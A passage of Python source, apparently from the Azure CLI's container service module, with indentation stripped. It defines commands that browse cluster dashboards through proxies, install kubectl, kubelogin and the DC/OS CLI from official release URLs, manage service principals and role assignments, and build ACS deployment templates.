import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ClientRequestError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError,
AzureInternalError,
FileOperationError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._client_factory import get_msi_client
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def get_cmd_test_hook_data(filename):
hook_data = None
curr_dir = os.path.dirname(os.path.realpath(__file__))
test_hook_file_path = os.path.join(curr_dir, 'tests/latest/data', filename)
if os.path.exists(test_hook_file_path):
with open(test_hook_file_path, "r") as f:
hook_data = json.load(f)
return hook_data
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError(
'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
if platform.machine() == 'arm64':
sub_dir, binary_name = 'darwin_arm64', 'kubelogin'
else:
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cmd, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cmd.cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cmd, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_resource_id_regular_expression():
return re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
_re_user_assigned_identity_resource_id = _get_user_assigned_identity_resource_id_regular_expression()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
raise ClientRequestError(ex.message)
return identity
raise InvalidArgumentValueError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
